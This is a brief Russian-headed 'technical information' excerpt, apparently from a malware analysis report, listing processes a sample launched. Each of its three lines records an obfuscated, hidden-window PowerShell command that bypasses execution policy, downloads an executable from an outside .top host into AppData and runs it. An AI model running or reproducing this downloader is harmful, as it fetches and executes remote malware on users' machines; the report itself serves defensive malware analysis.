Техническая информация
- '<SYSTEM32>\cmd.exe' /c "POWersHeLL.exE -ExecUtIoNpoliCy bYpsS -nOpROFILe -WinDowSTyLE HiDdEn (NEw-OBJeCT sYsTEM.NeT.WEbcLienT).dOwNLOdfIle('http://gotrustuni.top/serch.php','%APPDtA%.ExE');STRT-pRoceSs ...
- '<SYSTEM32>\cmd.exe' /c "POWersHeLL.exE -ExecUtIoNpoliCy bYpsS -nOpROFILe -WinDowSTyLE HiDdEn (NEw-OBJeCT sYsTEM.NeT.WEbcLienT).dOwNLOdfIle('http://gotrustuni.top/serch.php','%APPDtA%.ExE');STRT-pRoceSs ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecUtIoNpoliCy bYpsS -nOpROFILe -WinDowSTyLE HiDdEn (NEw-OBJeCT sYsTEM.NeT.WEbcLienT).dOwNLOdfIle('http://gotrustuni.top/serch.php','%APPDtA%.ExE');STRT-pRoceSs '%ApPDtA%.eXe'